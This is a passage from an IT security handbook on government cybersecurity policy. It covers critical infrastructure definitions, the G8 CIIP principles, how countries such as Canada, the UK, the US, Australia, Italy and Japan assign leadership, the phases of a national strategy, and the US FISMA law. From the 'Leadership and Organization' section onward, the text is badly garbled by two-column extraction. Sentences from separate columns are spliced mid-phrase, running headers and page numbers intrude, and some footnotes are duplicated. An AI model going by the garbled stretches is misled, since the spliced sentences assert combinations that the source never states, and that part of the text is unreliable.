While the picture varies from country to country, in most countries some or all components of the communications network and many of the critical infrastructures based on computer systems (banking, transportation, energy, manufacturing, etc.) are owned and operated by the private sector. Therefore, much of the responsibility for ensuring the security of these systems lies with the private sector.109 However, these systems are critical to the national well-being and are interdependent in ways that implicate broader public interests and justify government attention. Also, of course, the government has its own computer systems, including those that are crucial to national security, emergency services, health care, and other critical functions. These systems, in turn, often depend in part on privately owned communications networks. By and large, many of the computer systems of private companies and government agencies rely on the same hardware and software, designed and built by private companies. Thus, the picture is one of mutual interdependencies.

For all of these reasons, responsibility for computer security is shared between the government sector and the private sector. As a first priority, the government has a responsibility to "get its own house in order", that is, to implement sound security practices for its own systems. In addition, it is universally recognized that the government should use the power of the criminal law to punish and deter intentional attacks on private sector as well as on government computers. Beyond that, a growing number of governments are concluding that they must undertake additional responsibilities to promote sound computer security practices in the private sector. The challenge is to adopt government policies that maximize the benefits of government involvement without stifling innovation through overbearing regulation and technology mandates. Within a framework of partnership, the solution can be found in a balanced approach that includes:

· Market forces that encourage private enterprises to address the security of their computer systems in order to protect their profitability;
· The government's research and awareness-building functions;
· Computer crime laws protecting both government and privately-owned computers and networks;
· Traditional concepts of legal liability translated to the computer context; and
· Laws, regulations, and government policies that are specifically focused on promoting computer security.

The issue of cybersecurity policy can be viewed as one component of the larger issue of the role of law in fostering trust online. Creating an environment of trust in cyberspace requires the adoption of laws and government policies in other areas in addition to cyber-security. These other areas include consumer protection, data and communications privacy, intellectual property rights, and the framework for e-commerce. In the offline world, the law weaves a web of rules and protections around commercial and consumer transactions. Much of that same law applies to cyberspace, but countries seeking to promote development of ICT need to assess whether there are gaps in their laws that fail to promote trust in ways that are special to cyberspace. Indeed, countries eager to promote e-commerce may find that their laws for financial services, intellectual property, and consumer protection do not provide sufficient confidence or protection for offline transactions. The process of cyberlaw reform may occur as part of broader legal reforms. This Handbook focuses on those laws and policies that directly concern attacks on computer systems, leaving to other resources (some of which are cited in Part 3 and the Annexes) the questions of the broader enabling framework for ICT and e-commerce.110

This Part, while it discusses initiatives taken in developing and transitional countries, focuses in some detail on the programs and policies adopted by the most highly developed countries and by multi-national organizations. To a large degree, this is where the action has been to date. However, this focus on resources and models from developed countries and international bodies should not deter "the rest of the world." It is important that all countries develop, promote, and implement the necessary framework for e-security. The budgetary and human resources available are of course different, and developing countries may have to approach the issues at a more basic level, but the principles outlined here are global in relevance. Cyberspace and cyber-insecurity are not limited by state boundaries.

108 The following discussion draws upon the detailed surveys compiled by the American Bar Association's Privacy & Computer Crime Committee: Jody R. Westby, ed., International Guide to Combating Cybercrime, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003 (Westby Guide), http://www.abanet.org/abapubs/books/cybercrime/; Jody R. Westby, ed., International Strategy for Cyberspace Security, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003 (Westby Strategy). See also International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002), http://www.isn.ethz.ch/crn.

109 In some countries, privatization is quite recent, meaning that operators, regulators and policymakers are struggling with the new problem of security at the same time they are grappling with the full range of transitional problems associated with privatization.

The Concept of Critical Infrastructures

In a number of countries, the development of government responses to the problem of computer security has been conceptualized in terms of "critical infrastructures." A critical infrastructure is some network of physical assets and operating systems that serves a function of critical importance to the economic or governmental well-being of a country. The financial services network, for example, is a critical infrastructure, consisting of all the private banks, the central bank, the securities exchange and commodities markets, the payment clearinghouses, and other entities involved in the flow of money and credit. In virtually every country in the world, these functions are dependent upon computers. The transportation network is another critical infrastructure, consisting of roads, bridges, canals, railroads, and airports. The transportation infrastructure is largely physical and mechanical, but it too is increasingly dependent on computers to operate traffic lights, to open and close bridges, to switch trains, and to control air traffic.

There is no common definition of critical infrastructure categories, and the list of "critical infrastructures" used by policymakers varies from country to country and from time to time. The U.S. government cyber-security strategy issued in February 2003 identifies thirteen critical infrastructure categories: 1) agriculture; 2) food; 3) water; 4) public health; 5) emergency services; 6) government; 7) defense industrial base; 8) information and telecommunications; 9) energy; 10) transportation; 11) banking and finance; 12) chemicals and hazardous material; and 13) postal and shipping.111 By comparison, Canada's critical infrastructure protection strategy uses only six categories: 1) communications; 2) government; 3) energy and utilities; 4) services (within which Canada includes financial services, food distribution and health care); 5) safety; and 6) transportation.112 How a country defines "critical infrastructure" is not as important as the recognition of the concept itself.

The concept of critical infrastructures is important for several reasons. First, it can help crystallize why computer security is important: policymakers may better grasp the cyber-security problem if they understand that money will be frozen in banks, trains will not be able to leave their stations, and drinking water will not be pumped if certain computers fail. Second, infrastructure categories are important insofar as they help define lines of responsibility and communities of shared interest that need to work together to improve security. For example, the electric power industry and its government regulators can work together to good effect in addressing computer vulnerabilities of the electric power system. Computer security measures, including the identification of best practices and the sharing of information about vulnerabilities, can, to some extent, be developed and implemented within the context of existing institutions created along industry lines. In the private sector, these institutions include trade associations, standards bodies, and other self-regulatory bodies for various industries. On the government side, many nations implement their cyber-security policies through existing ministries and regulatory agencies that were created along sectoral lines many years ago (such as those that have traditionally regulated the banking, telecommunications, and energy sectors).

110 The Global Internet Policy Initiative has a host of resources on the full range of policy issues affecting ICT development: http://www.internetpolicy.net.

111 The National Strategy to Secure Cyberspace [United States], February 2003, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf.

112 Office of Critical Infrastructure Protection and Emergency Preparedness [Canada], http://www.ocipep.gc.ca/home/index_e.asp. For descriptions of how various other countries have responded to critical infrastructure protection, see "International Critical Information Infrastructure Protection Handbook," edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002), http://www.isn.ethz.ch/crn.

Currently there are a number of broad initiatives to stimulate a greater degree of cross-border cooperation in these areas. For example, in May of 2003, the G8 adopted eleven principles to consider when developing a strategy for reducing risks to critical information infrastructure (see http://www.cybersecuritycooperation.org/documents/G8_CIIP_Principles.pdf):

I. Countries should have emergency warning networks regarding cyber vulnerabilities, threats, and incidents.

II. Countries should raise awareness to facilitate stakeholders' understanding of the nature and extent of their critical information infrastructures, and the role each must play in protecting them.

III. Countries should examine their infrastructures and identify interdependencies among them, thereby enhancing protection of such infrastructures.

IV. Countries should promote partnerships among stakeholders, both public and private, to share and analyze critical infrastructure information in order to prevent, investigate, and respond to damage to or attacks on such infrastructures.

V. Countries should create and maintain crisis communication networks and test them to ensure that they will remain secure and stable in emergency situations.

VI. Countries should ensure that data availability policies take into account the need to protect critical information infrastructures.

VII. Countries should facilitate tracing attacks on critical information infrastructures and, where appropriate, the disclosure of tracing information to other countries.

VIII. Countries should conduct training and exercises to enhance their response capabilities and to test continuity and contingency plans in the event of an information infrastructure attack, and should encourage stakeholders to engage in similar activities.

IX. Countries should ensure that they have adequate substantive and procedural laws, such as those outlined in the Council of Europe Cybercrime Convention of 23 November 2001, and trained personnel to enable them to investigate and prosecute attacks on critical information infrastructures, and to coordinate such investigations with other countries as appropriate.

X. Countries should engage in international cooperation, when appropriate, to secure critical information infrastructures, including by developing and coordinating emergency warning systems, sharing and analyzing information regarding vulnerabilities, threats, and incidents, and coordinating investigations of attacks on such infrastructures in accordance with domestic laws.

XI. Countries should promote national and international research and development and encourage the application of security technologies that are certified according to international standards.

Computer security is characterized by interrelationships across sectors, including similar or identical hardware and software and dependency on a common communications network. Therefore, governments must design policies that ensure sharing of information about vulnerabilities and solutions across infrastructure categories. This can be greatly facilitated by the designation of centralized leadership within the government to coordinate cyber-security policies and programs; we will return to this point later.

CHAPTER 2. PROTECTING GOVERNMENT SYSTEMS

All of the issues pertaining to small and medium sized enterprises that are covered in Part 3 are equally applicable to government systems. Just as an enterprise needs to protect itself, its suppliers, and its customers, the government must protect its systems and its citizens from security threats, both physically and in cyberspace. Local and national governments cannot afford to have major crises such as interruption of operations that are based on computers, loss of confidential data, or theft of computing resources. Security incidents that are well-publicized lead to a diminution of public trust and present an obstacle to promotion of e-government initiatives. Therefore, government's first responsibility in terms of computer security is probably to "get its own house in order"

an economic, national security, or law enforcement problem?

· Canada has put much of the authority for cyber-security in its Ministry of National Defence.113
· In the United Kingdom, the Home Office, which is mainly a law enforcement ministry, has the lead.114
· The United States has put the issue within the newly created Department of Homeland Security, but consciously left the Computer Security Division of the National Institute of Standards and Technology under the Commerce Department.115
· Australia has created an E-Security Coordination Group to coordinate cybersecurity policy, an inter-agency body chaired by the National Office for the Information Economy, which is an Executive Agency116 under the Minister for Communications, Information Technology and the Arts.
order," meaning that government agencies at all levels · Italy has established an Interministerial Committee (national, provincial, and local) must protect the computer for Responsible Use of the Internet, managed by the systems that they own and operate. These include the Department of Innovation and Technologies in the computer systems used by government agencies or min- Prime Minister's Office. istries, including national defense authorities, law · In Japan, in 2000, the Prime Minister established a enforcement, public health and safety and emergency branch for IT security in the Cabinet Office in order response agencies, and central banks. Government- to better coordinate security policy and measures owned infrastructures that are dependent on computers among ministries and agencies. The branch is com- may also include water systems, hydroelectric dams, the posed of experts from concerned ministries and air traffic control system, and other facilities, depending agencies and from the private sector.117 on what is privatized and what is government owned. Leadership and Organization The choice of where within government to place cyber- P security leadership can be significant. For example, the ART issues surrounding the sharing of information about Computer security poses leadership and organizational cyber-security vulnerabilities and when to disclose vul- challenges within government. For purposes of defining nerabilities to the public require a balancing of interests. responsibilities within government, is computer security Placing responsibility for cyber-security within the FOUR 113Canada's Office of Critical Infrastructure Protection and Emergency Preparedness is a civilian organization operating within the Ministry of National Defence. 
114The U.K.'s Home Office has created a National Infrastructure Security Coordination Centre (NISCC) to coordinate critical infrastructure protection issues, provide alerts and attack response assistance, and facilitate public-private relationships to protect infrastructure. Within NISCC, there is a Computer Emergency Response Team, known as UNIRAS. An Electronic Attack Response Group (EARG) is also within NISCC to provide assistance to critical infrastruc- ture organizations and government departments that suffer an attack. UNIRAS will provide an early warning and alert service to all UK businesses. The NISCC website (http://www.niscc.gov.uk) provides detailed information on the British government's approach. 115In some ways, the United States is a complex model of coordination, and may therefore be of limited utility as an example for developing countries. The Homeland Security Act of 2002 places responsibility for security of both government and private sector computer systems in the Department of Homeland Security, but the Federal Information Security Management Act of 2002 gives the Office of Management and Budget in the White House respon- sibility for overseeing security of government computer systems, and a Homeland Security Council in the White House also has responsibility for coordinat- ing cybersecurity policy. 116Under Australian law, Executive Agencies are non-statutory bodies established by the Governor-General when a degree of independence within the gov- ernmental structure is needed and when the functions of the agency require a government-wide approach. The head of an Executive Agency is appointed by, and directly accountable to a Minister, in this case the Minister for Communications, Information Technology and the Arts. See http://www.noie.gov.au/Projects/confidence/Protecting/nat_agenda.htm. 117See http://www.kantei.go.jp/foreign/it/security/2000/0519taisei.html. 
168 INFORMATION SECURITY AND GOVERNMENT POLICIES defense ministry, which likely has a tradition of national scholarships for computer security studies, where the security secrecy, may hamper information sharing and scholarships require graduates to work a certain number produce a policy that does not sufficiently promote public of years for the government. A short-term solution may awareness. Since public-private partnership is a major be a secondment program with the private sector where- component of what we believe to be the most effective by corporate cyber-security experts are loaned to the computer security strategy, leadership for cyber-security government but paid in whole or in part by their private may better be placed within an economic affairs agency sector employers. For both developed and developing or an intergovernmental body under the nation's countries, the problem of human resources in cyber- chief executive. security may be a manifestation of the government's broader difficulty in paying salaries competitive But more important than the question of which agency with the private sector in order to attract qualified, or agencies should be given responsibility for computer committed employees. security is the point that some national leadership should be designated to ensure that computer security will Developing a National Cyber-Security receive government-wide attention. There are important Strategy organizational questions to be considered when it comes to getting powerful existing ministries to address computer The process of developing a "national cyber-security security. If the agency with cyber-security leadership is strategy" can be an effective means of deciding what a granted only the powers of persuasion and publicity, its nation's cyber-security vulnerabilities are, what the ability to improve security in other ministries may be government's responsibilities should be, and what poli- limited. 
Therefore, mechanisms should be considered that cies and legal reforms need to be adopted. A national give the office charged with cyber-security leadership the cyber-security strategy can also define the relationship authority to require other ministries and departments to of the government to the private sector. Here we will address the security of their own systems. The ultimate focus mainly on the elements of a cyber-security power to require ministries to comply with computer strategy that concern protecting the government's own security standards may be the authority to disapprove computers. Later on in Part 4, we will discuss the role those government agencies' computer purchases that do of the government in improving the security of private not meet security standards. sector systems. The U.S. strategy explains the reason for the distinction: To some extent, the United States has taken this approach, giving its Office of Management and Budget "In general, the private sector is best equipped and in the Office of the President authority to approve or structured to respond to an evolving cyber threat. disapprove expenditure of funds for computer systems There are specific instances, however, where federal based on various considerations, including security. government response is most appropriate and justi- Other less drastic measures include requiring fied. Looking inward, providing continuity of govern- ministries and government agencies to conduct ment requires ensuring the safety of [the govern- annual cyber-security audits and report the results ment's] own cyber infrastructure and those assets to the cyber-security office. Whatever structures are required for supporting its essential missions and chosen, leadership from the office of the president or services. 
Externally, a government role in cyber-securi- prime minister will probably be needed to ensure that ty is warranted in cases where high transaction costs all departments are taking the issue seriously. or legal barriers lead to significant coordination prob- lems; cases in which governments operate in the Another organizational challenge for government is the absence of private sector forces; resolution of incen- problem of human resources: Governments may find it tive problems that lead to under provisioning of critical hard to attract and retain well-qualified computer security shared resources; and raising awareness."118 personnel. Effective responses may include college 118The National Strategy to Secure Cyberspace [United States], February 2003, p. ix, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 169 To date, the United States has had probably the most and that no formal structure existed for the coordination extensive and most transparent process of developing a and implementation of government policy for protecting national cyber-security strategy, but the same themes critical infrastructures.121 In the United States, to study emerge in the initiatives of other countries and interna- the issue, the President appointed a board of corporate tional bodies. While details of the process and of the and government officials, known as the President's resulting organizational structures and laws will vary Critical Infrastructure Protection Board in 1996. The from country to country, the process of developing a board had no regulatory powers and was not a perma- cyber-security strategy is similar to that which many nent body. 
It conducted hearings, interviews, countries have undertaken in developing national ICT and research and issued a report that described the strategies.119 Indeed, security is best seen as a compo- problem and drew the attention of policymakers, nent of a nation's ICT strategy, and a cyber-security corporate officials, the media and the public. strategy can be developed with the same institutions The Board presented its report in October 1997, and mechanisms used to develop a nation's basic pro- calling for closer cooperation between the private gram for ICT development. Japan, for example, has sector and the government and making numerous incorporated cyber-security into its "e-Japan Priority specific recommendations. Policy Program" of March 2001.120 The second phase is to create some permanent structure Looking at the experiences of those countries that within the executive branch to coordinate policy have developed national cyber-security strategies, development and implementation. In Canada, for some common elements or phases emerge: example, following the issuance of an assessment by an inter-departmental Critical Infrastructure Protection 1.Assessment of national vulnerabilities and issuance Task Force, the government created an Information of a public report that conceptualizes the issue and Protection Coordination Centre to collect information, raises awareness of policymakers and the public; assess threats, and analyze incidents and an Office of 2.Creation of a leadership structure within the executive Critical Infrastructure Protection and Emergency branch to oversee the development and Preparedness to provide national leadership on critical implementation of policy; infrastructure protection issues.122 3.Drafting of a detailed national plan based on dialogue with the private sector; In the United States, Presidents Clinton 4.Adoption of legislation and guidelines addressing such and Bush issued a series of executive directives P questions as information 
sharing and accountability. establishing policymaking and oversight bodies ART within the executive branch of the federal government. The first phase is to broadly assess vulnerabilities and The directives called for the development of a national raise awareness. Australia, for example, published the plan for infrastructure protection.123 These Presidential report "Australia's National Information Infrastructure: orders did not give federal agencies authority over FOUR Threats and Vulnerabilities" in 1997. The report, pre- the systems of the private sector; instead, they pared by the Defence Signals Directorate, concluded emphasized public-private partnership and information that Australian society was vulnerable to significant sharing. Other leadership structures are discussed disruption due to vulnerabilities in computer networks above under "Leadership and Organization." 119For descriptions of how various other countries developed their cyber-security strategies, see International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 120http://www.kantei.go.jp/foreign/it/network/priority-all/index.html. 121See International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002), p. 18, http://www.isn.ethz.ch/crn. 122Office of Critical Infrastructure Protection and Emergency Preparedness [Canada], http://www.ocipep.gc.ca/critical/nciap/disc_e.asp. 
123President Clinton issued Presidential Decision Directive (PDD) 63: Critical Infrastructure Protection, May 22, 1998, http://www.fas.org/irp/offdocs/pdd- 63.htm and PDD 62: Protection Against Unconventional Threats to the Homeland and Americans Overseas, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-62.htm. In the aftermath of September 11, 2001, President Bush signed two executive orders reallocating functions and creating new entities within the executive branch responsible for critical infrastructure protection. E.O. 13228, Establishing the Office of Homeland Security and the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm; E.O. 13231, Critical Infrastructure Protection in the Information Age, October 16, 2001, http://www.ciao.gov/News/EOonCriticalInfrastrutureProtection101601.html. 170 INFORMATION SECURITY AND GOVERNMENT POLICIES The third phase involves the development of the corporations were consulted. Other national cyber strategy itself. As noted above, a national cyber- strategies include that of Australia.126 security strategy can be a free-standing document or it can be part of the nation's overall ICT strategy. Other strategy efforts have been undertaken at a A key to this process is dialogue between government regional level. The European Union has developed and the private sector. 
In Japan, which has incorporat- a cyber-security strategy not in a single document, ed cyber-security into its overall ICT strategy, the but rather in a series of Communications and proposals process was carried out jointly by the "IT Strategy from the Commission and a Council resolution, issued Headquarters" established within the Cabinet and the over a period of years.127 The Asia Pacific Economic "IT Strategy Council," made up of 20 opinion leaders, Cooperation (APEC) forum has adopted a regional which was established in order to combine private- cyber-security strategy, drafted by the Telecommunications and public-sector strengths.124 In the United States, and Information Working Group (TEL) with active the cyber-security strategy is a free-standing document. participation of the private sector.128 The Organization of American States (OAS) has undertaken regional work Development of the U.S. cyber-security strategy as well.129 In June 2003, the OAS General Assembly involved a lengthy process of public dialogue, managed approved a resolution calling for development of an by the staff of the National Security Council. The first inter-American strategy against threats to computer version of the strategy was issued in 2000. A revised information systems and networks.130 The Organization plan was published in draft in the fall of 2002 and in for Economic Cooperation and Development (OECD) has final form in February 2003.125 At all stages of the issued a set of Guidelines that constitute a roadmap for process, the U.S. plans were drafted on the basis of governments (and private enterprises) in developing extensive consultations within government and cybersecurity strategies.131 between the government and the private sector. Ten public meetings were held in major cities around the A consistent set of themes emerges from these national, country to gather input on the development of the regional and international cyber-security strategies: strategy. 
Civil society groups, trade associations and 124"e-Japan Priority Policy Program," March 29, 2001, http://www.kantei.go.jp/foreign/it/network/priority-all/index.html. 125The final version is The National Strategy to Secure Cyberspace, Feb. 14, 2003: http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. The National Strategy to Secure Cyberspace was supplemented by The National Strategy for the Physical Protection of Critical Infrastructures and Key Assets, released March 4, 2003, http://www.dhs.gov/interweb/assetli- brary/Physical_Strategy.pdf. Both of these documents are implementing components of The National Strategy for Homeland Security, issued by the White House on July 16, 2002. 126E-Security National Agenda [Australia], September 2001 http://www.noie.gov.au/projects/confidence/Protecting/nat_agenda.htm. 127European Commission, Proposal for a Regulation of the European Parliament and of the Council - Establishing the European Network and Information Security Agency, Feb. 11, 2003, COM(2003) 63 final, 2003/0032 (COD), http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf; Council of the European Union, Council Resolution of 28 January 2002 on a common approach and specific actions in the area of network and information security, (2002/C 43/02), http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf; European Commission, Proposal for a Council Framework Decision on attacks against information systems, Apr. 
19, 2002, COM(2002) 173 final, 2002/0086 (CNS), http://europa.eu.int/eur- lex/en/com/pdf/2002/com2002_0173en01.pdf; European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm; European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(20000) 890 final, http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html. 128Available at: http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. In October 2002, APEC Ministers underscored the importance of protecting the integrity of APEC's communications and information systems while allowing the free flow of infor- mation. In responding to this challenge, they supported the TEL cyber-security strategy and instructed officials to implement it. http://203.127.220.67/apec/ministerial_statements/annual_ministerial/2002_14th_apec_ministerial.html#policies. 129The OAS's initial work focused on cybercrime. See material compiled at http://www.oas.org/juridico/english/cyber_experts.htm. 130Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 1939 (XXXIII-O/03) (Resolution adopted at the fourth plenary session, held on June 10, 2003) http://www.oas.org/main/main.asp?sLang=E&sLink=http://www.oas.org/documents/eng/documents.asp. 
131Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf; "Implementation Plan for the OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security," Organization for Economic Cooperation and Development, Working Party on Information Security and Privacy, DSTI/ICCP/REG(2002)6/FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/LinkTo/dsti-iccp-reg(2002)6-final. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 171 ·Public-Private Partnership: Effective cybersecurity ·Training and Education: The APEC Strategy states, requires a public-private partnership.132 The private "The development of the human resources is critical sector has primary responsibility for ensuring the to the success of efforts to improve security. In security of its systems and networks. order to achieve cybersecurity, governments and cor- porations must have personnel trained in the com- ·Public Awareness: "Participants in a network, plex technical and legal issues raised by cybercrime whether as developer, owner, operator, or individual and critical infrastructure protection. user, must be aware of the threats to and vulnerabil- ities of the network and assume responsibility for ·Respect for Privacy: ICT networks transmit and protecting that network according to their position store communications and personal information of and role."133 the most sensitive character. 
Privacy is a crucial component of trust in cyberspace and cybersecurity ·Best Practices, Guidelines and International strategies must be implemented in ways compatible Standards: Cybersecurity should be based on the with the essential values of a democratic society.135 growing number of voluntary, consensus-based stan- dards and best practices being developed through ·Vulnerability Assessment, Warning and Response: international standards bodies and cooperative insti- As the APEC strategy puts it: "Successfully combating tutions. These standards are crucial guides to gov- cybercrime and protecting information infrastructures ernments' internal policies. Governments need not depends upon economies having in place systems for and should not mandate technical standards for the evaluating threats and vulnerabilities and issuing private sector.134 required warnings and patches. By identifying and sharing information on a threat before it causes wide- ·Information Sharing: It is widely recognized spread harm, networks...can be better protected."136 that cyber-security efforts have been hampered The United States Strategy calls for the creation of a by system operators' reluctance to disclose National Cyberspace Security Response System to vulnerabilities and attacks. Sharing of information rapidly identify attacks on computer networks. should be encouraged among private sector entities, between the private sector and the government, and internationally. P ART 130Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 1939 (XXXIII-O/03) (Resolution adopted at the fourth plenary session, held on June 10, 2003) http://www.oas.org/main/main.asp?sLang=E&sLink=http://www.oas.org/documents/eng/documents.asp. 
131Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf; "Implementation Plan for the OECD Guidelines for the Security of FOUR Information Systems and Networks: Towards a Culture of Security," Organization for Economic Cooperation and Development, Working Party on Information Security and Privacy, DSTI/ICCP/REG(2002)6/FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/LinkTo/dsti-iccp-reg(2002)6-final. 132See, e.g., APEC, "Statement on the Security of Information and Communications Infrastructure," Fifth APEC Ministerial Meeting on Telecommunications and Information Industry, Shanghai, China, May 29-30, 2002, http://www.apecsec.org.sg/virtualib/minismtg/telminAnnexB_SICI.html. Canada's National Critical Infrastructure Assurance Program Discussion Paper emphasizes public/private sector interaction and cooperation. http://www.ocipep.gc.ca/critical/nciap/disc_e.asp (Draft), Nov. 1, 2002. Article 7 of Japan's Basic Law on the Formation of an Advanced Information and Telecommunications Network Society specifies that the private sector is to take the lead in forming an advanced information and telecommunications net- work, with the state and local governments implementing supportive measures to ensure the private sector can exert its full potential. Basic Law on the Formation of an Advanced Information and Telecommunications Network Society, Law No. 144 of 2000, Nov. 2000, http://www.kantei.go.jp/foreign/it/it_basiclaw/it_basiclaw.html. 133APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. 
See also, Council of the European Union, Council Resolution of 28 January 2002 on a common approach and specific actions in the area of network and informa- tion security, (2002/C 43/02), http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf. Awareness is a major theme as well of the OECD guidelines and the work of the G8. 134For example, while the U.S. strategy addresses both government systems and privately owned and operated infrastructures, it concludes that the gov- ernment should not dictate security standards for private sector systems. The National Strategy to Secure Cyberspace, February 2003, pp. 11, 15, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. 135 Principle 5 of the OECD Guidelines is "Democracy." OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf. Protection of privacy and civil liberties is a guiding principle of the U.S. strategy. The National Strategy to Secure Cyberspace [United States], February 2003, p. 4, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetli- brary/National_Cyberspace_Strategy.pdf. 136APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. 
172 INFORMATION SECURITY AND GOVERNMENT POLICIES ·International Cooperation: Governments should government computer systems, Congress adopted the work together to develop compatible cybercrime Federal Information Security Management Act (FISMA) laws and law enforcement cooperation and of 2002, strengthening requirements and oversight should work through international organizations mechanisms within the federal government.139 A similar to facilitate dialogue and partnerships among approach has been followed in Tunisia, where the gov- international public and private sectors focused ernment in 2002 adopted security regulations that on protecting promoting a global "culture require government agencies to perform an annual security of security."137 audit of their computer systems. The process of developing and implementing a Structuring Responsibility: Implementing cyber-security strategy for a government has many a Cyber-Security Strategy for Government of the same elements as the development and Systems ­ The U.S. Approach implementation of a computer security program for a corporate enterprise: In the United States, policy for addressing the security of the federal government's own information systems is · Assess vulnerabilities. defined in greater detail and implemented through the · Raise awareness. Federal Information Security Management Act, adopted · Designate program leadership to serve as policy in 2002.140 The law illustrates some of the ways in which coordinator and for oversight. accountability can be built into implementation of · Develop a risk management program. cyber-security across multiple agencies. · Adopt appropriate security guidelines. · Structure accountability. The stated purpose of FISMA is to provide · Periodically reassess and continuously improve. 
government-wide management and oversight of computer security, including coordination of information The fourth phase (focusing for the moment on the security efforts throughout the civilian, national security of government systems) is the promulgation security, and law enforcement agencies, and to provide of guidelines or the enactment of any necessary laws for the development and maintenance of minimum addressing cyber-security issues. Some countries, controls required to protect government information such as Japan and Italy, have approached this issue systems. The law acknowledges that commercially devel- through guidelines. In July 2000, the IT Security oped products offer dynamic and effective computer Promotion Committee at the Cabinet level issued security solutions for the government. It leaves to "Guidelines for IT Security Policy," requiring all offices individual agencies the selection of specific technical and ministries by FY2003 to implement an assessment hardware and software security solutions from among of IT security policies and to take other steps to raise commercially developed products. the level of security. In March 2001, Japan's Inter- Ministerial Council for Promoting the Digitization of FISMA requires the head of each agency to develop, Public Administration issued security guidelines for all document, and implement an agency-wide Information IT government procurements.138 In the United States, Security Program for the information systems that support where the Congress concluded that the Executive the operations of the agency, including those provided or Branch was not adequately improving the security of managed by contractors.141 The program must include: 137International cooperation has been a major theme of the G8, see Presidents' Summary: Meeting of G8 Ministers of Justice and Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm, and of the OECD as well. 
138http://www.kantei.go.jp/foreign/it/network/priority-all/7.html. Italy's Minister for Innovation and technologies issued "The government's guidelines for the development of the information society" in June 2002. http://www.innovazione.gov.it/eng/documenti/linee_guida_eng.pdf. The audit office of New South Wales, Australia has issued a checklist for governments called "Implementing e-Government - Being Ready," http://www.audit.nsw.gov.au/guides-bp/e-govt-BPG.pdf, which includes a chapter on security. 139Federal Information Security Management Act, Title III of the E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA- final.pdf. FISMA is discussed further below. 140Federal Information Security Management Act, Title III of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf and http://www.fedcirc.gov/library/legislation/FISMA.html. Parts of FISMA are codified in Titles 40 and 44 of the United States Code. 141Title 44, United States Code, section 3544. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 173 ·Periodic assessments of the risk and magnitude of practices and on compliance with each element of the the harm that could result from the unauthorized required agency-wide Information Security Program. access, use, disclosure, disruption, modification, or Additionally, the adequacy and effectiveness of informa- destruction of information or systems. tion security policies, procedures, and practices must be addressed in a number of other plans and reports, ·Policies and procedures that: including those relating to annual agency budgets, pro- gram performance, financial management, and internal o are based on the risk assessments; accounting and administrative controls. 
